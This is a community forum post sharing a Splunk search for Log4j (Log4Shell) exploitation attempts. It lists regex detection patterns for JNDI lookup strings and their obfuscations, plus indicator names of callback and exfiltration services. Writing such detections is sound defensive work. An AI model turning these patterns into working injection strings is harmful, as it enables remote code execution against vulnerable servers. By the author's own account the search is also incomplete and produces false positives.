Hello, As we know, trying to create an all-encompassing search for the log4j is a very difficult task because of the infinite number of possibilities for entering the letters jndi and any of the possible protocols; ex. ldap; dns; https; etc. We came up with this SPL, which has been very successful. However, there is a good possibility of some false positives. We haven't found too many though. index=* AND "\$"
```All sites discussing log4j examples containing at least one dollar sign. Therefore, we are only reporting those types of events.```
```No evidence (thus far) has been shown that these logs would contain log4j-type strings. Therefore, these logs are excluded.```
AND NOT source IN (/var/adm/messages, /var/adm/sulog, /var/adm/syslog*, /var/log/authlog, /var/log/messages, /var/log/secure, /var/log/syslog, /var/log/sudo.log, bandwidth, cpu, interfaces, iostat, netstat, openPorts, protocol, ps, top, vmstat, nfsiostat)
AND NOT sourcetype=syslog
```These 12 strings have been found in events with different variations of the log4j string.```
AND ((Basic AND Base64) OR "/securityscan" OR "/callback" OR exploit OR "/nessus" OR (interact OR interactsh) OR kryptoslogic OR "service.exfil.site" OR secresponstaskfrce OR billdemirkapi OR mburpcollab OR leakix)
```Flags/Indicators to match the different strings above.```
| eval base64=if(match(_raw,"Base64"),"X","")
| eval dnsscan=if(match(_raw,"/securityscan"),"X","")
| eval exploit=if(match(_raw,"Exploit"),"X","")
| eval nessus=if(match(_raw,"/nessus"),"X","")
| eval interact=if(match(_raw,"interact") or match(_raw,"interactsh"),"X","")
| eval kryptos=if(match(_raw,"kryptoslogic"),"X","")
| eval exfilsite=if(match(_raw,"service.exfil.site"),"X","")
| eval secrettask=if(match(_raw,"secresponstaskfrce"),"X","")
| eval billdemirk=if(match(_raw,"billdemirkapi"),"X","")
| eval burpcollab=if(match(_raw,"mburpcollab"),"X","")
| eval leakix=if(match(_raw,"leakix"),"X","")
```These are the known protocols where log4j attacks have been seen. These matches look for the first letter used for each protocol (j), followed by anything, then the next letter (n), etc. This "hopefully" will catch any/all possible variations used by attackers. Note: A future search is being designed to find where URL Encoding repalces any/all of the letters within each JNDI protocol string.```
| where match(_raw,"j.*n.*d.*i.*\:.*l.*d.*a.*p")
or match(_raw,"j.*n.*d.*i.*\:.*d.*n.*s")
or match(_raw,"j.*n.*d.*i.*\:.*r.*m.*i")
or match(_raw,"j.*n.*d.*i.*\:.*l.*d.*a.*p.*s")
or match(_raw,"j.*n.*d.*i.*\:.*n.*i.*s")
or match(_raw,"j.*n.*d.*i.*\:.*i.*i.*o.*p")
or match(_raw,"j.*n.*d.*i.*\:.*c.*o.*r.*b.*a")
or match(_raw,"j.*n.*d.*i.*\:.*n.*d.*s")
or match(_raw,"j.*n.*d.*i.*\:.*h.*t.*t.*p")
or match(_raw,"j.*n.*d.*i.*\:.*h.*t.*t.*p.*s")
or match(_raw,"(\:)*-")
or match(_raw,"lower\:")
or match(_raw,"upper\:")
or match(_raw,"date\:")
or match(_raw,"env\:")
or match(_raw,"jndi")
| sort 0 -_time
| table _time, index, host, source, status, base64, dnsscan, exploit, nessus, interact, kryptos, exfilsite, secrettask, billdemirk, burpcollab, leakix, _raw, http_user_agent, We have found events also substituting URL Encoded characters for jndi........ Please let me, and the rest of our Splunk community, know if there are any issues with this search. Also, any new text signatures discovered other than those in Step 2. And any other discoveries. Together, let's find, stop this vulnerability. Thanks and God bless, Genesius
... View more